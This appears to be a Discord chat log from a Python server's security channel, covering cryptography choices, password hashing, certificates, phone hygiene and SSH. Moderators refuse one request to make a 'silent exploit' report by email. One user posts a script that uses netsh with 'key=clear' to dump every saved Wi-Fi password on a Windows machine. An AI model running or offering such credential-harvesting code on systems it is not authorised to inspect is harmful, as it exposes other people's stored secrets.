
/ add me

Anyone have experience using python + ssis / visual studio

Are there any other Public/Private key encryption algorithms other than RSA that I can use in Python and through a socket connection?

I wanna use something else

EC based cryptography? https://cryptography.io/en/latest/hazmat/primitives/asymmetric/index.html

Hello, im making a script wich i will distribute, but here is a thing, in my script is my vps login details, how i can "protect" or encrypt that details, this details will be not modifiable, so its pyarmour a good option to obfuscate the script, and then compile to exe?

You don't.

You don't hide your login details in something you distribute to other people.

Even if you hide it perfectly in your program, which isn't possible, someone can just use wireshark or fiddler and see your login details.

can any one teach me how to connect my .py silent exploit to be reporting on my email ???

that would probably illegal, wouldn't it?

!rule 5

So is this better to use than RSA?

` # coding: utf-8
import subprocess
import re

command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output = True).stdout.decode()

NameWifi = (re.findall("liste des réseaux:(.*)\r",command_output))

wifi_list = list()

if len(NameWifi) != 0:
for name in NameWifi:
wifi_profile = dict()
profile_info = subprocess.run(["netsh", "wlan", "show", "profile", name],capture_output = True).stdout.decode()
if re.search("Security key:Absent", profile_info):
continue
else:
wifi_profile["ssid"] = name
profile_info_pass = subprocess.run(["netsh", "wlan", "show", "profile", name, "key=clear"],capture_output = True).stdout.decode()
password = re.search("Key Content:(.*)\r", profile_info_pass)
if password == None:
wifi_profile["password"] = None
else:
wifi_profile["password"] = password[1]
wifi_list.append(wifi_profile)

for x in range(len(wifi_list)):
print(wifi_list[x]) ` Hello y have a problem utf 8 encode but i don't understand it's possible help please

As far as I know EC based crypto need shorter keys to provide same level of security so yes

Hello, I don't know is my question suitable for here... But i still asking..

.Can python be used for ehtical hacking on non python computer?

Hmm, yes? Python is just a tool

what is the best way to learn ethical hacking?

there are several udemy courses you can take @full pebble but its difficult to find good reliable resources

oh yes I know

There's a instructor

Andrei Neagoie

who helped me learning python

and I will learn hacking

courses of him only

or I will take

IT ceh hacker course

it gets complicated fast btw

i learnt by just messing around with making my own programs

hmm why?

theres so much to learn lol

This is the IT certified

LOL same here

i mean go for it then

yes

i havent taken a proper course

I will go

for it

ive just mesed around

nice

just take that one

Why don't you take?

eh im not interested in it that much

i have much more fun messing around

https://www.itpro.tv/courses/ec-council/ceh-v10/

lol cool

Same here

I used to watch netwrok chucks

videos

and mess around

lol

lol

yes

I think tryhackme.com is a good intro. The "rooms" as they are called dont have the depth that you will find elsewhere when you do your own research, but it will provide you with a space to play without concern of legal issues. They have machines ready to deploy, you connect to their VPN, and you can use a VM to do stuff to the deployed machines.

A lot of times they are going to straight up give you the answers. Its really on you to take what you can play with there and learn to apply it. But its definitely a place to start that is not intimidating.

I would suggest getting basic Linux in first if you have not

https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit

picoctf and overthewire are also good for beginners

I recently got into "hacker101"'s CTF, since now the site gives error 504, what would you guys recommend for CTFs @fading plaza I looked through some of the answers here and am looking for more alternatives.

My friends were just talking about 2021-3156, but I havent gotten to read it yet.

You have to think about... as many people are scrambling to secure whatever they have running Unix system right now, there are people who are like, "Its open season."

sudo apt upgrade sudo

sudo echo Hello World

HackTheBox (HTB)

p

!rule 6

seeing all your 17 messages are all useless and identical, I'd say you're an annoying spammer

Why are you spamming p over and over again what's the point?

It's not p - it's russian r

oh thx

r

wait do i know u

ur in the among us server

the dead among us server

Hi, I just checked my phone and I saw two exact copies of Twitter sitting on my screen, and I dun recall installing any apps recently. What should I do other than deleting the app? I'm worried if I'm compromised in any other ways

@fervent hemlock have you done anything yet? What type of phone do you have

android, i dun recall downloading anything

What you can do before doing anything is to check where it's from. Long press the app, you will a small popup and then click "App info".
Scroll to bottom and click "app details in play store" (or something similar)

You will then get taken to the Google Play store page, here you will have further details about the "source" and you can verify if the app is legitmate

I dun think i have that option, tho an option called "explore"

not explore, that may be a custom thing provided by the app

well no, I'm sure it's not legitimate cuz it's only 100kb somethinf and the version is like 837388

like if I do this on my reminder-app I get "Add a reminder" and "Appinfo"

Anyway, 100kb sounds shady!

I would definitely not trust it. To actually find out where the app is coming from (whom installed it) is harder

Is deleting just the app safe? idk what else could be downloaded along with it

but what you can do is enable a few options so apps can only be installed from Google Play store, I also advice you go through app permissions and disallow any apps to install stuff.
There is few more things you will have to do other than uninstalling the app to make sure your phone is safe and secure....

Oh where do I enable those options? and yes please tell I'm definitely gonna do all xD

Hold on....

This would be a lot easier physically, lol...

sorry for the trouble

1. Ensure that Google Play Protect is on if you use Google Play Store
   https://support.google.com/googleplay/answer/2812853?hl=en
2. Make sure your phone is updated (check About in Settings-app, usually all the way in the bottom)
3. Important! Make sure that "unknown sources" is disabled (this allows other apps to install apps you don't know!)
   Navigate settings app -> scroll down to Security and click "Install unknown apps", make sure that each app you see there has "Not allowed". If one has, note it down and write it here, that app may be the source of the fake twitter-app
4. I would go through and uninstall any apps you don't use or don't know from:
   Navigate settings app -> scroll down to Apps and go through the list. There may be a lot of apps you can't remove, they are installed by the manufacturer, apps like Messages or Phone.
5. If you can manage, go through the Permission list after removing unwanted apps.
   Navigate settings app -> scroll down to Apps, then click"three-dots" for more options in the top-right corner then click "Permission-manager", here you can see what apps are allowed to do what.

Going through it now!

You can read more about apps permissions here: https://www.kaspersky.com/blog/android-8-permissions-guide/23981/

Thanks Kaspersky!

Thank you for the help I have disabled all the install permissions from external sources

Such a small task, but indeed it's scary that an unknown app appeared on your phone.
Good on you for acting on it @fervent hemlock !!

I advise each and one of you to think twice if that app is really needed when you install and the permissions list is so long you don't even bother reading it.

Yeah, I dun usually leave any unwanted apps around, it's really scary to see something I have never installed before appearing like that

🙂

@fervent hemlock all good, issue resolved or any questions?

yeshh thank you, I just deleted the app and was double confirming if there's anything else left

Glad to hear!

hey guys, i just got a raspberry pi and i've just setup apache running on a certain IP address
as long as another device is connected to the same internet, it's able to access the server
however, once the device that's sending a request to the server is connected on a different internet connection
it can't connect to the server anymore
so if i device b is the client side and device a is the server
if device b is on the same internet connection as device a
then it works
otherwise the page is not recognized because the device b is on a different internet connection
i wanna host this flask server on a custom domain
how do i do that?

@worthy lodge check the answer in #networks

thanks :P

guys im hosting website and this is what i got in the terminal

Exception happened during processing of request from ('127.0.0.1', 60054)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/http/server.py", line 647, in __init__
    super().__init__(*args, **kwargs)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/usr/lib/python3.8/http/server.py", line 654, in do_GET
    self.copyfile(f, self.wfile)
  File "/usr/lib/python3.8/http/server.py", line 853, in copyfile
    shutil.copyfileobj(source, outputfile)
  File "/usr/lib/python3.8/shutil.py", line 205, in copyfileobj
    fdst_write(buf)
  File "/usr/lib/python3.8/socketserver.py", line 799, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

it seems like an attack. Im hosting it locally on a spare pc that i have. Am i in danger ? If so, how can i protect myself?

That’s not an attack as far as I can see just an exception that u missed in ur program. U need an exception for ConnectionResetError. "Connection reset by peer" is the TCP/IP abrupt connection termination not an attack

Hi guys, sorry that my first post is just me asking for help!
I'm doing the cs50 course, not looking for a solution (academic honesty!) but I am struggling to find information about more secure hashing functions?
Final project is a relatively (I hope) simple python, flask SQL website.
I know there's:
PBKDF2
sha256_crypt
and 3 forms of argon2

but I'm not all that knowledgeable on cyber security so I'm struggling to evaluate the different positives and negatives, if there's a webpage I've missed I apologise, most of the ones I found are from 2011-2017 which seems like a while ago

So far just wanting to hash passwords and emails as I get the feeling storing them in plaintext might be just a little frowned upon 🙂

no

Do you want to hash e-mails? Can you tell me why?

so that if the website is hacked people's emails aren't exposed

Hash or encrypt?

If you want to hash them you cannot retrieve them back

well there's no reason to expose even myself to their email, so I was thinking hash

Okay

I think that Argon2 is good enough to hashing nowadays

only time I'd need to email them is verification, email/password change, password recovery, and in those instances I'm hoping that the input data can be used to verify they account, as in each case I can make them type in their email address, but I'm really new to all of this so if I'm just misunderstanding completely let me know

I have never heard about such solution but it seems that it can work

so traditionally email addresses are just encrypted and not hashed?

if so, seems like maybe I should just go that route instead for the email address, as I say, I'm terribly new as still on the intro to cs course (cs50) from harvard

the thing is, im not running any python programs

I have seen only e-mails in plaintext in databases

Both solutions have advantages and disadvantages

I don't understand why that'd be a good thing, because you don't want hackers to have a list of people's email addresses, card details are of course the worst (looking at certain airline databreaches) and passwords as well, but yeah...

Card details is different kind of data. If you have hashed e-mail you cannot communicate with users - like inform them about data breach

you mean email?

Right, sorry for typo

So like I said - every solution has advantages and disadvantages. You should make some simple risk analysis and identity your opponents or something

For example there is no need for enterprise solutions when you are hosting small service in your personal server

I think I'll need to put this on heroku though I'm not 100% sure

I think I'll want to anyway, just to get feedback from people

Hmm people know other alternatives to exec()?

I am making a Discord bot and I am not sure if I should make it safer lmao

Do you want to allow users to execute commands on your machine via bot's commands?

What exactly is a certificate, is it a hash, file, something else? How does it verify who you are? Does everyone have one?

Certificate is couple of things like validity dates (from - to), your name, public key and so on. There is field for issuer too along with his signature of this certificate.

So what form is it in?

Like is has all that information and things, but what form is it in?

@sonic drum did you even read up on what a certificate is?

yes

Good, then you should know tgat it's a chain of trust. Where there is a root certificate and the certificate below are signed by the root certificate and so on. And they come in different formats

I won't explain it all, if you got any specific questions e.g what alternativ names are , fire away

Check for example X509 certs

okay

dont think its an attack as the request '127.0.0.1', 60054 is internal 127.0.0.1 is ur local IP address the python files are normal but are causing errors as I stated before. I would check the last login of all user accounts including root to be sure but that looks normal in the context of information

What free tool do people use to manage their python dependency vulnerabilities for their project? I already looked into Snyk

Hey all

How python is used in security?

Can anyone tell me pls?

idk

Ik how to do basic Python but not security

hello guys

xan i hack with python>?

technically, you can hack with any language

though I won't tell you more because of rule 5

!rule 5

Is it necessary to use a salt with PBKDF2? I really doubt anybody has made rainbow tables for it, especially considering how almost every implementation is unique in the amount of iterations and hashing function it uses.

I think that if you didn't use a salt, you'd get the same hash for each password, right?

what do you mean

I'm not storing multiple passwords

Oh - what are you storing?

I'm using PBKDF2 to generate an AES key from a master password

OK, I think it would be ok then, if it is just for you (someone please chime in if I'm wrong here)

Right, you will get same key for this password if you don't use salt

I don't see any weak points in this scheme, however there are recommendations in NIST documents that you should use at least 128-bit salt generated from the random source

Check 5.1 and A 2.1 https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-132.pdf

Seadeef more like

Sea reef

scratch?

https://scratch.mit.edu/

Hacking with scratch?!?!?!?!

Is this a real question? If yes - I don't know Scratch but if you can send TCP/UDP packets you can hack even with it

it's a half real question, scratch isn't really a dev language, it's a tool for teaching kids how to program, spend 60 seconds looking at it and you'll understand

you guys are python experts

i released a new hacking tool on github

pls check it and tell me what must be improved

here is the link

!warn 751779359031033907 Please do not posting anything that can be used maliciously. This includes anything for pen-testing or any type of hacking.

:incoming_envelope: :ok_hand: applied warning to @thorn obsidian.

it is on github

That doesn't matter, it's malicious.

ok then

but can u tell me where it is legal

@thorn obsidian there is a difference between researching security and creating malicious toolkits. You have done the latter and that is not tolerated here.

If you want to research and want to do security-related stuff, checkout Live0verflow on YouTube

as long as can can have access to networking (either through the language itself or a convenient interface with another), why not?

I’d be really interested to see how they’d escape the scratch software for running scratch XD

I don't know scratch, though. So I can't tell you how

but the point is that if you can send packets (in any way) over the network, then there's probably a way to hack something

It’s a training language for kids

https://en.scratch-wiki.info/wiki/Communicating_to_Scratch_via_Python

You drag and drop commands and control backgrounds and sprites (like that cat) , to teach kids about how processes work

if a Python program does the interface, then maybe you can do something

it's used more for communicating with sensors, but it's possible

That’d be using python instead though :p I was mainly being silly with my suggestion

kind of, but if you can communicate arbitrary things with the Python program and it just does the relaying, then you can send packets over the network, and thus have the start of the hack procedure

what does that mean @thorn obsidian

it's an incredibly vague question and there's really no such thing as a 'cyber security system' with no other contest

context

Anyone familiar with scrapy?

https://dontasktoask.com/

where would be a good place to learn security practices with python

im a bit interested

well that's not really storing

how do you store the dict

uh

oh

that's interesting

Hard coding the accounts?

what hash func are you using?

like raw sha-512?

no pbkdf?

pbkdf is kinda old, but it should be fine

though you may want to check out newer hashing funcs such as argon2 or bcrypt

yeah, it should be fine if you have a small fixed number of user/passwords

hey there

Are there any best practice for storing password in memory for the whole runtime duration, in the order of hours? Specifically, I want to store it for IMAP IDLE checks. So it is used approximately every 20~30 minutes. Are there any problems with just storing it in a variable?

Hi all , I have a problem in python build . I am building python with already built FIPS openssl , but somehow python still letting execute md5() , the python version is 3.7.4

memory is secure - if an attacker has the ability to access the memory of another program your security has already failed

memory cannot always be assumed to be secure. If there is a Heartbleed-type vulnerability, recent memory (even if protected) can be dumped. And unencrypted memory is definitely not safe against local attacks

so it depends how safe you want to be. If it's for sensitive, but not secret data, memory is safe enough against remote attacks if you don't have a server listening to external communication

for secret data against remote attacks, memory may be assumed secure enough in most cases

Mm. Good point. I am not entirely sure what attack vectors I want to guard against, since it is just for my personal use.

(see above)

That's one way to look at it. Let the system/experts do the work for me.

An option can be to fetch the password from a source every time.

How do I ensure the password variable gets cleared? Use gc?

IIRC, Python does not have a deterministic GC by default.

is that source any more secure than memory

if not, dont bother

It lets me pass on the responsiblity to someone else.

if you cannot ensure that both the source and the tunnel are at least as secure as the source, then you should not do it that way

The keyring package, so likely Secret Service, or Windows own password store.

also yes if the security of memory itself is an issue then python probably isn't the right tool

there might be a way to somehow guarantee that the memory previously allocated to some object is cleared when released, but i imagine that it would be quite difficult

Mm. I guess this boils down to clearing memory when it is not needed, and as you said, Python might not be the tool for that.

yeah, Python is probably not the right tool for that. Any reference to an object prevents it from getting deleted. So you might accidentally leave a reference to your key undeleted until the end of the program, and memory never gets freed

even if it should always get freed after usage

Mm. I can only think of storing in byte arrays directly, and zero-ing or otherwise randomise that after use. Too much of a hassle for a personal tool.

Actually, that wouldn't work either. I still need to transform that into a string for the library to use. Nevermind.

Meh. Thanks for your advices and opinions. The "unsecure" memory high way it is.

welcome. it's probably good enough for your purpose, but well... you can never be certain

there's no point in avoiding storing things in memory out of security, since as mark says if you get a buffer overflow or underrun then you're completely screwed anyway

and you have to load the secret into memory at some poitn anyway

I have a string that is in base64 raw and want to decode it using the public and private RSA keys. How can I proceed with decoding the string?

I don't know much about RSA and cryptography in general so it world help a lot if someone could help

You can use cryptography.io and serialization.load_pem_private_key if it is PEM format

I'm trying to do it with JS crypto library and it's raising illegal padding error

Are you sure that it's valid private key?

it's a public.. It's 2 pub key actually... 1st 128 uses 1st key and the remaining 74 the 2nd key

I guess I'll have to slice the enc msg and then pass it with it's appropriate key

var decrypted = crypto.publicDecrypt(
    {
      key: publicKey,
      padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
    },
    buffer
  );``` this is the padding I'm using rn

I don't know what this function is doing since I am not JS dev however here you have loading with PKCS12 padding https://cryptography.io/en/3.2/hazmat/primitives/asymmetric/serialization/#cryptography.hazmat.primitives.serialization.pkcs12.load_key_and_certificates

Can configuring an SSH connection put the client device at risk?

Are you mean during establishing? If there are vulnerabilities in the software - yes.

I think OpenSSH is the default linux distros use? I just dont want to put my primary computer at risk

I don't know, I am using Debian/Ubuntu mostly and don't know anything about other distros

Same, I just dont know whether to use SSH or not

what do you want to use it for

managing a remote computer

Both computers are yours?

yes

it'd be a local connection between the two computers, but I dont want to open them up to some sort of attack

I really don't know what are you afraid of - connecting machine to network can be seen as dangerous. Just be sure to use strong keys and turn off options that allow to connect as root or by using password

hey guys anyone get PTS exam?

from Elearnsecurity

!rule 6

Greetings, I have a base64 string which was decoded using RSA public key.. That decoded string now has various info, I was able to extract most of it while learning from the internet but it also has an image and I'm not sure about what section to encode to image to get the image. How can know which part belongs to image?

this should help a lil on understanding what I mean

this is a python server - if you would like help with js maybe try the js discord (im sure that one exists). youll probably get much better responses there

!rule 3

I'm from #help-cupcake :
I've been redirected to here.

Hello, I have a question about deploying a script in a virtual environment on linux. (specifically a raspberry pi which is based on Debian)
I want my script to run on startup and restart if it stops.
and it needs to run in the virtual environment because I want its environment variables and libraries to be isolated.

I'm new to doing something like this, could anyone help me?

this doesn't have to be Python. but I have a checksum of a file, but it uses a proprietary algorithm to generate checksum. I also have the file in question. is there any way that I could possibly reverse engineer this and find the checksum algorithm?

Anything stored locally can be reverse engineered with enough skill and time

The real question is, is it worth it?

No, but I want to torture myself

:p

Hi, I want to implement authentication with username and password, for this I found OAuth2 Grant type Password that solves the problem. But it’s recommended that not to use grant type password for Mobile devices which is a public client as per RFC documentations.
What are the other or best approach to implement OAuth ?

hi, i want to start in web security and vulnerability scanning what should i do ? and what is the best books for that ?

$PNT (

bugcrowd and hackerone have their discord servers, in which there are channels dedicated to resources

that could guide the beginners

look into it

Thanks <3 !

np

$PNT (hi)

Hi, is anyone here familiar with beautifulsoup?
I would like to extract the attributes of the child elements in a form element

wrong channel

#❓｜how-to-get-help

do anyone know pen testing ???

Hey @thorn obsidian!

Hey @thorn obsidian!

why

That's just the rules of this discord server

so i can't share my program? 😦

ok

if rules don't allow then i will just share it with my friends

You can, just dump it on a PasteBin-like service, and give us the link

and btw can i read the source code of a pyc file?

if i understand correctly, it is compiled,so u can ony get the strings